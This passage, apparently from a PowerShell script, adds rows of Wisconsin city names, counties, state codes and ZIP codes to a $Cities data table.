$Cities.Rows.Add("South byron","Dodge","Wisconsin","WI","55","53006") + $null = $Cities.Rows.Add("Butler","Waukesha","Wisconsin","WI","55","53007") + $null = $Cities.Rows.Add("Campbellsport","Fond du Lac","Wisconsin","WI","55","53010") + $null = $Cities.Rows.Add("Cascade","Sheboygan","Wisconsin","WI","55","53011") + $null = $Cities.Rows.Add("Cedarburg","Ozaukee","Wisconsin","WI","55","53012") + $null = $Cities.Rows.Add("Cedar grove","Sheboygan","Wisconsin","WI","55","53013") + $null = $Cities.Rows.Add("Chilton","Calumet","Wisconsin","WI","55","53014") + $null = $Cities.Rows.Add("Cleveland","Manitowoc","Wisconsin","WI","55","53015") + $null = $Cities.Rows.Add("Clyman","Dodge","Wisconsin","WI","55","53016") + $null = $Cities.Rows.Add("Colgate","Washington","Wisconsin","WI","55","53017") + $null = $Cities.Rows.Add("Delafield","Waukesha","Wisconsin","WI","55","53018") + $null = $Cities.Rows.Add("Eden","Fond du Lac","Wisconsin","WI","55","53019") + $null = $Cities.Rows.Add("Elkhart lake","Sheboygan","Wisconsin","WI","55","53020") + $null = $Cities.Rows.Add("Waubeka","Ozaukee","Wisconsin","WI","55","53021") + $null = $Cities.Rows.Add("Germantown","Washington","Wisconsin","WI","55","53022") + $null = $Cities.Rows.Add("Glenbeulah","Sheboygan","Wisconsin","WI","55","53023") + $null = $Cities.Rows.Add("Grafton","Ozaukee","Wisconsin","WI","55","53024") + $null = $Cities.Rows.Add("Hartford","Washington","Wisconsin","WI","55","53027") + $null = $Cities.Rows.Add("Hartland","Waukesha","Wisconsin","WI","55","53029") + $null = $Cities.Rows.Add("Horicon","Dodge","Wisconsin","WI","55","53032") + $null = $Cities.Rows.Add("Hubertus","Washington","Wisconsin","WI","55","53033") + $null = $Cities.Rows.Add("Hustisford","Dodge","Wisconsin","WI","55","53034") + $null = $Cities.Rows.Add("Iron ridge","Dodge","Wisconsin","WI","55","53035") + $null = $Cities.Rows.Add("Ixonia","Jefferson","Wisconsin","WI","55","53036") + $null = $Cities.Rows.Add("Jackson","Washington","Wisconsin","WI","55","53037") + $null = $Cities.Rows.Add("Johnson creek","Jefferson","Wisconsin","WI","55","53038") + $null = $Cities.Rows.Add("Juneau","Dodge","Wisconsin","WI","55","53039") + $null = $Cities.Rows.Add("Kewaskum","Washington","Wisconsin","WI","55","53040") + $null = $Cities.Rows.Add("Kiel","Manitowoc","Wisconsin","WI","55","53042") + $null = $Cities.Rows.Add("Kohler","Sheboygan","Wisconsin","WI","55","53044") + $null = $Cities.Rows.Add("Brookfield","Waukesha","Wisconsin","WI","55","53045") + $null = $Cities.Rows.Add("Lannon","Waukesha","Wisconsin","WI","55","53046") + $null = $Cities.Rows.Add("Lebanon","Dodge","Wisconsin","WI","55","53047") + $null = $Cities.Rows.Add("Knowles","Dodge","Wisconsin","WI","55","53048") + $null = $Cities.Rows.Add("Malone","Fond du Lac","Wisconsin","WI","55","53049") + $null = $Cities.Rows.Add("Mayville","Dodge","Wisconsin","WI","55","53050") + $null = $Cities.Rows.Add("Menomonee falls","Waukesha","Wisconsin","WI","55","53051") + $null = $Cities.Rows.Add("Mount calvary","Fond du Lac","Wisconsin","WI","55","53057") + $null = $Cities.Rows.Add("Nashotah","Waukesha","Wisconsin","WI","55","53058") + $null = $Cities.Rows.Add("Neosho","Dodge","Wisconsin","WI","55","53059") + $null = $Cities.Rows.Add("New holstein","Calumet","Wisconsin","WI","55","53061") + $null = $Cities.Rows.Add("Newton","Manitowoc","Wisconsin","WI","55","53063") + $null = $Cities.Rows.Add("Oakfield","Fond du Lac","Wisconsin","WI","55","53065") + $null = $Cities.Rows.Add("Oconomowoc","Waukesha","Wisconsin","WI","55","53066") + $null = $Cities.Rows.Add("Okauchee","Waukesha","Wisconsin","WI","55","53069") + $null = $Cities.Rows.Add("Oostburg","Sheboygan","Wisconsin","WI","55","53070") + $null = $Cities.Rows.Add("Pewaukee","Waukesha","Wisconsin","WI","55","53072") + $null = $Cities.Rows.Add("Plymouth","Sheboygan","Wisconsin","WI","55","53073") + $null = $Cities.Rows.Add("Port washington","Ozaukee","Wisconsin","WI","55","53074") + $null = $Cities.Rows.Add("Random lake","Sheboygan","Wisconsin","WI","55","53075") + $null = $Cities.Rows.Add("Richfield","Washington","Wisconsin","WI","55","53076") + $null = $Cities.Rows.Add("Rubicon","Dodge","Wisconsin","WI","55","53078") + $null = $Cities.Rows.Add("Saint cloud","Fond du Lac","Wisconsin","WI","55","53079") + $null = $Cities.Rows.Add("Saukville","Ozaukee","Wisconsin","WI","55","53080") + $null = $Cities.Rows.Add("Sheboygan","Sheboygan","Wisconsin","WI","55","53081") + $null = $Cities.Rows.Add("Howards grove","Sheboygan","Wisconsin","WI","55","53083") + $null = $Cities.Rows.Add("Sheboygan falls","Sheboygan","Wisconsin","WI","55","53085") + $null = $Cities.Rows.Add("Slinger","Washington","Wisconsin","WI","55","53086") + $null = $Cities.Rows.Add("Stockbridge","Calumet","Wisconsin","WI","55","53088") + $null = $Cities.Rows.Add("Sussex","Waukesha","Wisconsin","WI","55","53089") + $null = $Cities.Rows.Add("Zcta 53090","Washington","Wisconsin","WI","55","53090") + $null = $Cities.Rows.Add("Theresa","Dodge","Wisconsin","WI","55","53091") + $null = $Cities.Rows.Add("Mequon","Ozaukee","Wisconsin","WI","55","53092") + $null = $Cities.Rows.Add("Waldo","Sheboygan","Wisconsin","WI","55","53093") + $null = $Cities.Rows.Add("Watertown","Jefferson","Wisconsin","WI","55","53094") + $null = $Cities.Rows.Add("West bend","Washington","Wisconsin","WI","55","53095") + $null = $Cities.Rows.Add("Mequon","Ozaukee","Wisconsin","WI","55","53097") + $null = $Cities.Rows.Add("Watertown","Dodge","Wisconsin","WI","55","53098") + $null = $Cities.Rows.Add("Zcta 530hh","Calumet","Wisconsin","WI","55","530HH") + $null = $Cities.Rows.Add("Big bend","Waukesha","Wisconsin","WI","55","53103") + $null = $Cities.Rows.Add("Bristol","Kenosha","Wisconsin","WI","55","53104") + $null = $Cities.Rows.Add("Burlington","Racine","Wisconsin","WI","55","53105") + $null = $Cities.Rows.Add("Caledonia","Racine","Wisconsin","WI","55","53108") + $null = $Cities.Rows.Add("Cudahy","Milwaukee","Wisconsin","WI","55","53110") + $null = $Cities.Rows.Add("Darien","Walworth","Wisconsin","WI","55","53114") + $null = $Cities.Rows.Add("Delavan","Walworth","Wisconsin","WI","55","53115") + $null = $Cities.Rows.Add("Dousman","Waukesha","Wisconsin","WI","55","53118") + $null = $Cities.Rows.Add("Eagle","Waukesha","Wisconsin","WI","55","53119") + $null = $Cities.Rows.Add("East troy","Walworth","Wisconsin","WI","55","53120") + $null = $Cities.Rows.Add("Elkhorn","Walworth","Wisconsin","WI","55","53121") + $null = $Cities.Rows.Add("Elm grove","Waukesha","Wisconsin","WI","55","53122") + $null = $Cities.Rows.Add("Fontana","Walworth","Wisconsin","WI","55","53125") + $null = $Cities.Rows.Add("Franksville","Racine","Wisconsin","WI","55","53126") + $null = $Cities.Rows.Add("Genoa city","Walworth","Wisconsin","WI","55","53128") + $null = $Cities.Rows.Add("Greendale","Milwaukee","Wisconsin","WI","55","53129") + $null = $Cities.Rows.Add("Hales corners","Milwaukee","Wisconsin","WI","55","53130") + $null = $Cities.Rows.Add("Franklin","Milwaukee","Wisconsin","WI","55","53132") + $null = $Cities.Rows.Add("Helenville","Jefferson","Wisconsin","WI","55","53137") + $null = $Cities.Rows.Add("Kansasville","Racine","Wisconsin","WI","55","53139") + $null = $Cities.Rows.Add("Kenosha","Kenosha","Wisconsin","WI","55","53140") + $null = $Cities.Rows.Add("Kenosha","Kenosha","Wisconsin","WI","55","53142") + $null = $Cities.Rows.Add("Kenosha","Kenosha","Wisconsin","WI","55","53143") + $null = $Cities.Rows.Add("Kenosha","Kenosha","Wisconsin","WI","55","53144") + $null = $Cities.Rows.Add("New berlin","Waukesha","Wisconsin","WI","55","53146") + $null = $Cities.Rows.Add("Lake geneva","Walworth","Wisconsin","WI","55","53147") + $null = $Cities.Rows.Add("Lyons","Walworth","Wisconsin","WI","55","53148") + $null = $Cities.Rows.Add("Mukwonago","Waukesha","Wisconsin","WI","55","53149") + $null = $Cities.Rows.Add("Muskego","Waukesha","Wisconsin","WI","55","53150") + $null = $Cities.Rows.Add("New berlin","Waukesha","Wisconsin","WI","55","53151") + $null = $Cities.Rows.Add("North prairie","Waukesha","Wisconsin","WI","55","53153") + $null = $Cities.Rows.Add("Oak creek","Milwaukee","Wisconsin","WI","55","53154") + $null = $Cities.Rows.Add("Palmyra","Jefferson","Wisconsin","WI","55","53156") + $null = $Cities.Rows.Add("Pleasant prairie","Kenosha","Wisconsin","WI","55","53158") + $null = $Cities.Rows.Add("Rochester","Racine","Wisconsin","WI","55","53167") + $null = $Cities.Rows.Add("Salem","Kenosha","Wisconsin","WI","55","53168") + $null = $Cities.Rows.Add("Silver lake","Kenosha","Wisconsin","WI","55","53170") + $null = $Cities.Rows.Add("South milwaukee","Milwaukee","Wisconsin","WI","55","53172") + $null = $Cities.Rows.Add("Springfield","Walworth","Wisconsin","WI","55","53176") + $null = $Cities.Rows.Add("Sturtevant","Racine","Wisconsin","WI","55","53177") + $null = $Cities.Rows.Add("Sullivan","Jefferson","Wisconsin","WI","55","53178") + $null = $Cities.Rows.Add("Trevor","Kenosha","Wisconsin","WI","55","53179") + $null = $Cities.Rows.Add("Twin lakes","Kenosha","Wisconsin","WI","55","53181") + $null = $Cities.Rows.Add("Union grove","Racine","Wisconsin","WI","55","53182") + $null = $Cities.Rows.Add("Wales","Waukesha","Wisconsin","WI","55","53183") + $null = $Cities.Rows.Add("Walworth","Walworth","Wisconsin","WI","55","53184") + $null = $Cities.Rows.Add("Wind lake","Racine","Wisconsin","WI","55","53185") + $null = $Cities.Rows.Add("Waukesha","Waukesha","Wisconsin","WI","55","53186") + $null = $Cities.Rows.Add("Waukesha","Waukesha","Wisconsin","WI","55","53188") + $null = $Cities.Rows.Add("Zcta 53189","Waukesha","Wisconsin","WI","55","53189") + $null = $Cities.Rows.Add("Whitewater","Walworth","Wisconsin","WI","55","53190") + $null = $Cities.Rows.Add("Williams bay","Walworth","Wisconsin","WI","55","53191") + $null = $Cities.Rows.Add("Wilmot","Kenosha","Wisconsin","WI","55","53192") + $null = $Cities.Rows.Add("Zenda","Walworth","Wisconsin","WI","55","53195") + $null = $Cities.Rows.Add("Zcta 531hh","Jefferson","Wisconsin","WI","55","531HH") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53202") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53203") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53204") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53205") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53206") + $null = $Cities.Rows.Add("Bay view","Milwaukee","Wisconsin","WI","55","53207") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53208") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53209") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53210") + $null = $Cities.Rows.Add("Shorewood","Milwaukee","Wisconsin","WI","55","53211") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53212") + $null = $Cities.Rows.Add("Wauwatosa","Milwaukee","Wisconsin","WI","55","53213") + $null = $Cities.Rows.Add("West allis","Milwaukee","Wisconsin","WI","55","53214") + $null = $Cities.Rows.Add("West milwaukee","Milwaukee","Wisconsin","WI","55","53215") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53216") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53217") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53218") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53219") + $null = $Cities.Rows.Add("Greenfield","Milwaukee","Wisconsin","WI","55","53220") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53221") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53222") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53223") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53224") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53225") + $null = $Cities.Rows.Add("Wauwatosa","Milwaukee","Wisconsin","WI","55","53226") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53227") + $null = $Cities.Rows.Add("Greenfield","Milwaukee","Wisconsin","WI","55","53228") + $null = $Cities.Rows.Add("Milwaukee","Milwaukee","Wisconsin","WI","55","53233") + $null = $Cities.Rows.Add("Saint francis","Milwaukee","Wisconsin","WI","55","53235") + $null = $Cities.Rows.Add("Zcta 532hh","Milwaukee","Wisconsin","WI","55","532HH") + $null = $Cities.Rows.Add("Racine","Racine","Wisconsin","WI","55","53402") + $null = $Cities.Rows.Add("Racine","Racine","Wisconsin","WI","55","53403") + $null = $Cities.Rows.Add("Racine","Racine","Wisconsin","WI","55","53404") + $null = $Cities.Rows.Add("Racine","Racine","Wisconsin","WI","55","53405") + $null = $Cities.Rows.Add("Racine","Racine","Wisconsin","WI","55","53406") + $null = $Cities.Rows.Add("Zcta 534hh","Racine","Wisconsin","WI","55","534HH") + $null = $Cities.Rows.Add("Albany","Green","Wisconsin","WI","55","53502") + $null = $Cities.Rows.Add("Arena","Iowa","Wisconsin","WI","55","53503") + $null = $Cities.Rows.Add("Argyle","Lafayette","Wisconsin","WI","55","53504") + $null = $Cities.Rows.Add("Avalon","Rock","Wisconsin","WI","55","53505") + $null = $Cities.Rows.Add("Avoca","Iowa","Wisconsin","WI","55","53506") + $null = $Cities.Rows.Add("Barneveld","Iowa","Wisconsin","WI","55","53507") + $null = $Cities.Rows.Add("Belleville","Dane","Wisconsin","WI","55","53508") + $null = $Cities.Rows.Add("Belmont","Lafayette","Wisconsin","WI","55","53510") + $null = $Cities.Rows.Add("Shopiere","Rock","Wisconsin","WI","55","53511") + $null = $Cities.Rows.Add("Black earth","Dane","Wisconsin","WI","55","53515") + $null = $Cities.Rows.Add("Blanchardville","Lafayette","Wisconsin","WI","55","53516") + $null = $Cities.Rows.Add("Blue mounds","Dane","Wisconsin","WI","55","53517") + $null = $Cities.Rows.Add("Blue river","Richland","Wisconsin","WI","55","53518") + $null = $Cities.Rows.Add("Brodhead","Green","Wisconsin","WI","55","53520") + $null = $Cities.Rows.Add("Brooklyn","Dane","Wisconsin","WI","55","53521") + $null = $Cities.Rows.Add("Browntown","Green","Wisconsin","WI","55","53522") + $null = $Cities.Rows.Add("Cambridge","Jefferson","Wisconsin","WI","55","53523") + $null = $Cities.Rows.Add("Clinton","Rock","Wisconsin","WI","55","53525") + $null = $Cities.Rows.Add("Cobb","Iowa","Wisconsin","WI","55","53526") + $null = $Cities.Rows.Add("Cottage grove","Dane","Wisconsin","WI","55","53527") + $null = $Cities.Rows.Add("Cross plains","Dane","Wisconsin","WI","55","53528") + $null = $Cities.Rows.Add("Dane","Dane","Wisconsin","WI","55","53529") + $null = $Cities.Rows.Add("Darlington","Lafayette","Wisconsin","WI","55","53530") + $null = $Cities.Rows.Add("Deerfield","Dane","Wisconsin","WI","55","53531") + $null = $Cities.Rows.Add("De forest","Dane","Wisconsin","WI","55","53532") + $null = $Cities.Rows.Add("Dodgeville","Iowa","Wisconsin","WI","55","53533") + $null = $Cities.Rows.Add("Edgerton","Rock","Wisconsin","WI","55","53534") + $null = $Cities.Rows.Add("Evansville","Rock","Wisconsin","WI","55","53536") + $null = $Cities.Rows.Add("Footville","Rock","Wisconsin","WI","55","53537") + $null = $Cities.Rows.Add("Fort atkinson","Jefferson","Wisconsin","WI","55","53538") + $null = $Cities.Rows.Add("Gotham","Richland","Wisconsin","WI","55","53540") + $null = $Cities.Rows.Add("Gratiot","Lafayette","Wisconsin","WI","55","53541") + $null = $Cities.Rows.Add("Highland","Iowa","Wisconsin","WI","55","53543") + $null = $Cities.Rows.Add("Hollandale","Iowa","Wisconsin","WI","55","53544") + $null = $Cities.Rows.Add("Janesville","Rock","Wisconsin","WI","55","53545") + $null = $Cities.Rows.Add("Janesville","Rock","Wisconsin","WI","55","53546") + $null = $Cities.Rows.Add("Jefferson","Jefferson","Wisconsin","WI","55","53549") + $null = $Cities.Rows.Add("Juda","Green","Wisconsin","WI","55","53550") + $null = $Cities.Rows.Add("Lake mills","Jefferson","Wisconsin","WI","55","53551") + $null = $Cities.Rows.Add("Linden","Iowa","Wisconsin","WI","55","53553") + $null = $Cities.Rows.Add("Livingston","Grant","Wisconsin","WI","55","53554") + $null = $Cities.Rows.Add("Lodi","Columbia","Wisconsin","WI","55","53555") + $null = $Cities.Rows.Add("Lone rock","Richland","Wisconsin","WI","55","53556") + $null = $Cities.Rows.Add("Lowell","Dodge","Wisconsin","WI","55","53557") + $null = $Cities.Rows.Add("Mc farland","Dane","Wisconsin","WI","55","53558") + $null = $Cities.Rows.Add("Marshall","Dane","Wisconsin","WI","55","53559") + $null = $Cities.Rows.Add("Mazomanie","Dane","Wisconsin","WI","55","53560") + $null = $Cities.Rows.Add("Merrimac","Sauk","Wisconsin","WI","55","53561") + $null = $Cities.Rows.Add("Middleton","Dane","Wisconsin","WI","55","53562") + $null = $Cities.Rows.Add("Milton","Rock","Wisconsin","WI","55","53563") + $null = $Cities.Rows.Add("Mineral point","Iowa","Wisconsin","WI","55","53565") + $null = $Cities.Rows.Add("Monroe","Green","Wisconsin","WI","55","53566") + $null = $Cities.Rows.Add("Montfort","Grant","Wisconsin","WI","55","53569") + $null = $Cities.Rows.Add("Monticello","Green","Wisconsin","WI","55","53570") + $null = $Cities.Rows.Add("Morrisonville","Dane","Wisconsin","WI","55","53571") + $null = $Cities.Rows.Add("Mount horeb","Dane","Wisconsin","WI","55","53572") + $null = $Cities.Rows.Add("Muscoda","Grant","Wisconsin","WI","55","53573") + $null = $Cities.Rows.Add("New glarus","Green","Wisconsin","WI","55","53574") + $null = $Cities.Rows.Add("Oregon","Dane","Wisconsin","WI","55","53575") + $null = $Cities.Rows.Add("Orfordville","Rock","Wisconsin","WI","55","53576") + $null = $Cities.Rows.Add("Plain","Sauk","Wisconsin","WI","55","53577") + $null = $Cities.Rows.Add("Prairie du sac","Sauk","Wisconsin","WI","55","53578") + $null = $Cities.Rows.Add("Reeseville","Dodge","Wisconsin","WI","55","53579") + $null = $Cities.Rows.Add("Rewey","Iowa","Wisconsin","WI","55","53580") + $null = $Cities.Rows.Add("Gillingham","Richland","Wisconsin","WI","55","53581") + $null = $Cities.Rows.Add("Ridgeway","Iowa","Wisconsin","WI","55","53582") + $null = $Cities.Rows.Add("Sauk city","Sauk","Wisconsin","WI","55","53583") + $null = $Cities.Rows.Add("Sharon","Walworth","Wisconsin","WI","55","53585") + $null = $Cities.Rows.Add("Shullsburg","Lafayette","Wisconsin","WI","55","53586") + $null = $Cities.Rows.Add("South wayne","Lafayette","Wisconsin","WI","55","53587") + $null = $Cities.Rows.Add("Spring green","Sauk","Wisconsin","WI","55","53588") + $null = $Cities.Rows.Add("Stoughton","Dane","Wisconsin","WI","55","53589") + $null = $Cities.Rows.Add("Sun prairie","Dane","Wisconsin","WI","55","53590") + $null = $Cities.Rows.Add("Verona","Dane","Wisconsin","WI","55","53593") + $null = $Cities.Rows.Add("Waterloo","Jefferson","Wisconsin","WI","55","53594") + $null = $Cities.Rows.Add("Waunakee","Dane","Wisconsin","WI","55","53597") + $null = $Cities.Rows.Add("Windsor","Dane","Wisconsin","WI","55","53598") + $null = $Cities.Rows.Add("Zcta 535hh","Columbia","Wisconsin","WI","55","535HH") + $null = $Cities.Rows.Add("Madison","Dane","Wisconsin","WI","55","53703") + $null = $Cities.Rows.Add("Madison","Dane","Wisconsin","WI","55","53704") + $null = $Cities.Rows.Add("Madison","Dane","Wisconsin","WI","55","53705") + $null = $Cities.Rows.Add("Madison","Dane","Wisconsin","WI","55","53706") + $null = $Cities.Rows.Add("Madison","Dane","Wisconsin","WI","55","53711") + $null = $Cities.Rows.Add("Fitchburg","Dane","Wisconsin","WI","55","53713") + $null = $Cities.Rows.Add("Madison","Dane","Wisconsin","WI","55","53714") + $null = $Cities.Rows.Add("Madison","Dane","Wisconsin","WI","55","53715") + $null = $Cities.Rows.Add("Monona","Dane","Wisconsin","WI","55","53716") + $null = $Cities.Rows.Add("Madison","Dane","Wisconsin","WI","55","53717") + $null = $Cities.Rows.Add("Madison","Dane","Wisconsin","WI","55","53718") + $null = $Cities.Rows.Add("Madison","Dane","Wisconsin","WI","55","53719") + $null = $Cities.Rows.Add("Zcta 537hh","Dane","Wisconsin","WI","55","537HH") + $null = $Cities.Rows.Add("Bagley","Grant","Wisconsin","WI","55","53801") + $null = $Cities.Rows.Add("Benton","Lafayette","Wisconsin","WI","55","53803") + $null = $Cities.Rows.Add("Bloomington","Grant","Wisconsin","WI","55","53804") + $null = $Cities.Rows.Add("Boscobel","Grant","Wisconsin","WI","55","53805") + $null = $Cities.Rows.Add("Cassville","Grant","Wisconsin","WI","55","53806") + $null = $Cities.Rows.Add("Cuba city","Grant","Wisconsin","WI","55","53807") + $null = $Cities.Rows.Add("Dickeyville","Grant","Wisconsin","WI","55","53808") + $null = $Cities.Rows.Add("Fennimore","Grant","Wisconsin","WI","55","53809") + $null = $Cities.Rows.Add("Glen haven","Grant","Wisconsin","WI","55","53810") + $null = $Cities.Rows.Add("Hazel green","Grant","Wisconsin","WI","55","53811") + $null = $Cities.Rows.Add("Lancaster","Grant","Wisconsin","WI","55","53813") + $null = $Cities.Rows.Add("Mount hope","Grant","Wisconsin","WI","55","53816") + $null = $Cities.Rows.Add("Patch grove","Grant","Wisconsin","WI","55","53817") + $null = $Cities.Rows.Add("Platteville","Grant","Wisconsin","WI","55","53818") + $null = $Cities.Rows.Add("Potosi","Grant","Wisconsin","WI","55","53820") + $null = $Cities.Rows.Add("Prairie du chien","Crawford","Wisconsin","WI","55","53821") + $null = $Cities.Rows.Add("Stitzer","Grant","Wisconsin","WI","55","53825") + $null = $Cities.Rows.Add("Wauzeka","Crawford","Wisconsin","WI","55","53826") + $null = $Cities.Rows.Add("Woodman","Grant","Wisconsin","WI","55","53827") + $null = $Cities.Rows.Add("Zcta 538hh","Crawford","Wisconsin","WI","55","538HH") + $null = $Cities.Rows.Add("Portage","Columbia","Wisconsin","WI","55","53901") + $null = $Cities.Rows.Add("Adams","Adams","Wisconsin","WI","55","53910") + $null = $Cities.Rows.Add("Arlington","Columbia","Wisconsin","WI","55","53911") + $null = $Cities.Rows.Add("Baraboo","Sauk","Wisconsin","WI","55","53913") + $null = $Cities.Rows.Add("Beaver dam","Dodge","Wisconsin","WI","55","53916") + $null = $Cities.Rows.Add("Brandon","Fond du Lac","Wisconsin","WI","55","53919") + $null = $Cities.Rows.Add("Briggsville","Marquette","Wisconsin","WI","55","53920") + $null = $Cities.Rows.Add("Burnett","Dodge","Wisconsin","WI","55","53922") + $null = $Cities.Rows.Add("Cambria","Columbia","Wisconsin","WI","55","53923") + $null = $Cities.Rows.Add("Cazenovia","Richland","Wisconsin","WI","55","53924") + $null = $Cities.Rows.Add("Columbus","Columbia","Wisconsin","WI","55","53925") + $null = $Cities.Rows.Add("Dalton","Green Lake","Wisconsin","WI","55","53926") + $null = $Cities.Rows.Add("Doylestown","Columbia","Wisconsin","WI","55","53928") + $null = $Cities.Rows.Add("Elroy","Juneau","Wisconsin","WI","55","53929") + $null = $Cities.Rows.Add("Endeavor","Marquette","Wisconsin","WI","55","53930") + $null = $Cities.Rows.Add("Fair water","Fond du Lac","Wisconsin","WI","55","53931") + $null = $Cities.Rows.Add("Fall river","Columbia","Wisconsin","WI","55","53932") + $null = $Cities.Rows.Add("Fox lake","Dodge","Wisconsin","WI","55","53933") + $null = $Cities.Rows.Add("Friendship","Adams","Wisconsin","WI","55","53934") + $null = $Cities.Rows.Add("Friesland","Columbia","Wisconsin","WI","55","53935") + $null = $Cities.Rows.Add("Grand marsh","Adams","Wisconsin","WI","55","53936") + $null = $Cities.Rows.Add("Hillpoint","Sauk","Wisconsin","WI","55","53937") + $null = $Cities.Rows.Add("Kingston","Green Lake","Wisconsin","WI","55","53939") + $null = $Cities.Rows.Add("Lake delton","Sauk","Wisconsin","WI","55","53940") + $null = $Cities.Rows.Add("La valle","Sauk","Wisconsin","WI","55","53941") + $null = $Cities.Rows.Add("Loganville","Sauk","Wisconsin","WI","55","53943") + $null = $Cities.Rows.Add("Lyndon station","Juneau","Wisconsin","WI","55","53944") + $null = $Cities.Rows.Add("Markesan","Green Lake","Wisconsin","WI","55","53946") + $null = $Cities.Rows.Add("Marquette","Green Lake","Wisconsin","WI","55","53947") + $null = $Cities.Rows.Add("Mauston","Juneau","Wisconsin","WI","55","53948") + $null = $Cities.Rows.Add("Montello","Marquette","Wisconsin","WI","55","53949") + $null = $Cities.Rows.Add("New lisbon","Juneau","Wisconsin","WI","55","53950") + $null = $Cities.Rows.Add("North freedom","Sauk","Wisconsin","WI","55","53951") + $null = $Cities.Rows.Add("Oxford","Marquette","Wisconsin","WI","55","53952") + $null = $Cities.Rows.Add("Packwaukee","Marquette","Wisconsin","WI","55","53953") + $null = $Cities.Rows.Add("Pardeeville","Columbia","Wisconsin","WI","55","53954") + $null = $Cities.Rows.Add("Poynette","Columbia","Wisconsin","WI","55","53955") + $null = $Cities.Rows.Add("Randolph","Dodge","Wisconsin","WI","55","53956") + $null = $Cities.Rows.Add("Reedsburg","Sauk","Wisconsin","WI","55","53959") + $null = $Cities.Rows.Add("Rio","Columbia","Wisconsin","WI","55","53960") + $null = $Cities.Rows.Add("Rock springs","Sauk","Wisconsin","WI","55","53961") + $null = $Cities.Rows.Add("Union center","Juneau","Wisconsin","WI","55","53962") + $null = $Cities.Rows.Add("Waupun","Dodge","Wisconsin","WI","55","53963") + $null = $Cities.Rows.Add("Westfield","Marquette","Wisconsin","WI","55","53964") + $null = $Cities.Rows.Add("Wisconsin dells","Columbia","Wisconsin","WI","55","53965") + $null = $Cities.Rows.Add("Wonewoc","Juneau","Wisconsin","WI","55","53968") + $null = $Cities.Rows.Add("Wyocena","Columbia","Wisconsin","WI","55","53969") + $null = $Cities.Rows.Add("Zcta 539hh","Adams","Wisconsin","WI","55","539HH") + $null = $Cities.Rows.Add("Deronda","Polk","Wisconsin","WI","55","54001") + $null = $Cities.Rows.Add("Baldwin","St. Croix","Wisconsin","WI","55","54002") + $null = $Cities.Rows.Add("Beldenville","Pierce","Wisconsin","WI","55","54003") + $null = $Cities.Rows.Add("Clayton","Polk","Wisconsin","WI","55","54004") + $null = $Cities.Rows.Add("Clear lake","Polk","Wisconsin","WI","55","54005") + $null = $Cities.Rows.Add("Cushing","Polk","Wisconsin","WI","55","54006") + $null = $Cities.Rows.Add("Deer park","St. Croix","Wisconsin","WI","55","54007") + $null = $Cities.Rows.Add("Dresser","Polk","Wisconsin","WI","55","54009") + $null = $Cities.Rows.Add("Ellsworth","Pierce","Wisconsin","WI","55","54011") + $null = $Cities.Rows.Add("Emerald","St. Croix","Wisconsin","WI","55","54012") + $null = $Cities.Rows.Add("Glenwood city","St. Croix","Wisconsin","WI","55","54013") + $null = $Cities.Rows.Add("Hager city","Pierce","Wisconsin","WI","55","54014") + $null = $Cities.Rows.Add("Hammond","St. Croix","Wisconsin","WI","55","54015") + $null = $Cities.Rows.Add("Hudson","St. Croix","Wisconsin","WI","55","54016") + $null = $Cities.Rows.Add("New richmond","St. Croix","Wisconsin","WI","55","54017") + $null = $Cities.Rows.Add("Osceola","Polk","Wisconsin","WI","55","54020") + $null = $Cities.Rows.Add("Prescott","Pierce","Wisconsin","WI","55","54021") + $null = $Cities.Rows.Add("River falls","Pierce","Wisconsin","WI","55","54022") + $null = $Cities.Rows.Add("Roberts","St. Croix","Wisconsin","WI","55","54023") + $null = $Cities.Rows.Add("Saint croix fall","Polk","Wisconsin","WI","55","54024") + $null = $Cities.Rows.Add("Somerset","St. Croix","Wisconsin","WI","55","54025") + $null = $Cities.Rows.Add("Star prairie","Polk","Wisconsin","WI","55","54026") + $null = $Cities.Rows.Add("Wilson","St. Croix","Wisconsin","WI","55","54027") + $null = $Cities.Rows.Add("Woodville","St. Croix","Wisconsin","WI","55","54028") + $null = $Cities.Rows.Add("Saint joseph","St. Croix","Wisconsin","WI","55","54082") + $null = $Cities.Rows.Add("Zcta 540hh","Pierce","Wisconsin","WI","55","540HH") + $null = $Cities.Rows.Add("Abrams","Oconto","Wisconsin","WI","55","54101") + $null = $Cities.Rows.Add("Amberg","Marinette","Wisconsin","WI","55","54102") + $null = $Cities.Rows.Add("Armstrong creek","Forest","Wisconsin","WI","55","54103") + $null = $Cities.Rows.Add("Athelstane","Marinette","Wisconsin","WI","55","54104") + $null = $Cities.Rows.Add("Center valley","Outagamie","Wisconsin","WI","55","54106") + $null = $Cities.Rows.Add("Navarino","Shawano","Wisconsin","WI","55","54107") + $null = $Cities.Rows.Add("Brillion","Calumet","Wisconsin","WI","55","54110") + $null = $Cities.Rows.Add("Cecil","Shawano","Wisconsin","WI","55","54111") + $null = $Cities.Rows.Add("Coleman","Marinette","Wisconsin","WI","55","54112") + $null = $Cities.Rows.Add("Combined locks","Outagamie","Wisconsin","WI","55","54113") + $null = $Cities.Rows.Add("Beaver","Marinette","Wisconsin","WI","55","54114") + $null = $Cities.Rows.Add("De pere","Brown","Wisconsin","WI","55","54115") + $null = 